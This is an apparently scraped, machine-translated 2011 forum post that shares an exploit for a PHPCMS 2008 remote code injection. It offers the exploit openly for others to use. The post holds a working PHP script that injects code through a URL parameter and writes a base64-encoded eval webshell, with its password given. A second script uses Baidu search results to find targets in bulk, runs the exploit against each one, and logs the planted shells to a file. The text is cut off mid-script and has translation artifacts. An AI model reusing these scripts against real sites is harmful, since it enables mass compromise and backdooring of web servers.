phpcms 2 0 0 8 latest 0day added bulk EXP-vulnerability warning-the black bar safety net

2011-11-12T00:00:00
ID MYHACK58:62201132337
Type myhack58
Reporter 佚名
Modified 2011-11-12T00:00:00

Description

Play the junk, throw it to everyone to play it. Now the hit rate is also good Oh. Direct GETSHELL it. Word password is c

EXP:

!/ usr/bin/php

<? php print_r(' +---------------------------------------------------------------------------+ PHPCMS Remote Code Inject GetShell Trojan Google Dork:Powered by Phpcms 2 0 0 8 code by secr +---------------------------------------------------------------------------+ '); if ($argc < 3) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$ argv[0].' host path host: target server (ip/hostname) path: path to phpcms Example: php '.$ argv[0].' localhost /phpcms/ +---------------------------------------------------------------------------+ '); exit; } error_reporting(0); set_time_limit(0); $host = $argv[1]; $path = $argv[2]; $exp ='/yp/product. php? view_type=1&catid=&pagesize={${fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgpz5vaw))}}&areaname=0&order=';

//Detect the presence of the vulnerability echo "[+] Try to determine the Bug....\ n"; $returnstr=httpRequestGET('/yp/product. php? view_type=1&catid=&pagesize={${phpinfo()}}&areaname=&order='); if(preg_match('/(php. ini)/i',$returnstr)){ echo("[+] This site has a Bug! We Will Be Try To Exploit It\n"); } else { exit("[-] Exploit Failed! This site has No Bug!\ n"); } //If there is a vulnerability, it sends EXP Getshell echo "[+] Try to create webshell....\ n"; httpRequestGET($exp); $content=httpRequestGET("/yp/shell.php"); //Send EXP after the acquisition of the shell to detect when the page has OK character, if there is, then GETWebshell success. //print_r($content); if(strpos($content,'ok')){ echo "[+] Expoilt successfully....\ n"; echo "[+] Webshell:http://$host{$path}yp/shell. php\n"; }else{ exit("[-] Exploit Failed!\ n"); }

//Simulate POST or GET request function. function httpRequestGET($url){ global $host, $path; $method=$method?' POST':'GET'; $payload = $method." ".$ path.$ url." HTTP/1.1\r\n"; $payload .= "Accept: /\r\n"; $payload .= "User-Agent: Payb-Agent\r\n"; $payload .= "Host:" . $host . "\r\n"; $payload .= "Connection: Close\r\n\r\n"; $fp = fsockopen(gethostbyname($host), 8 0); if (!$ fp) { echo 'No response from '.$ host; die; } fputs($fp, $payload); $resp = "; while ($fp && ! feof($fp)) $resp .= fread($fp, 1 0 2 4); return $resp; } ?& gt;

The bulk of the EXP is as follows, which might be large. Please large cattle weight.

<? php

error_reporting(E_ERROR);

set_time_limit(0);

$keyword='inurl:about/joinus' ; // batch keywords

$timeout = 1;

$stratpage = 1;

$lastpage = 1 0 0 0 0 0 0 0;

for ($i=$stratpage ; $i<=$lastpage ; $i++ ){

$array=ReadBaiduList($keyword,$timeout,$i);

foreach ($array as $url ){

$url_list=file('url.txt');

if (in_array("$url\r\n",$url_list)){

echo "[-] Links repeat\n";

}else{

$fp = @fopen('url.txt', 'a');

@fwrite($fp, $url."\ r\n");

@fclose($fp);

print_r("

[-] Get...... $url\r\n");

if(okbug($url)){

$exploit=exploit($url);

$ors=okor($url);

if ($ors){

echo "[*] Shell:-> ".$ url."/ yp/fuck. php\n";

$fp = @fopen('shell.txt', 'a');

@fwrite($fp, $url."/ yp/fuck. php\r\n");

@fclose($fp);

}

}else{

print "[-] No Bug!\ n";

}

[1] [2] next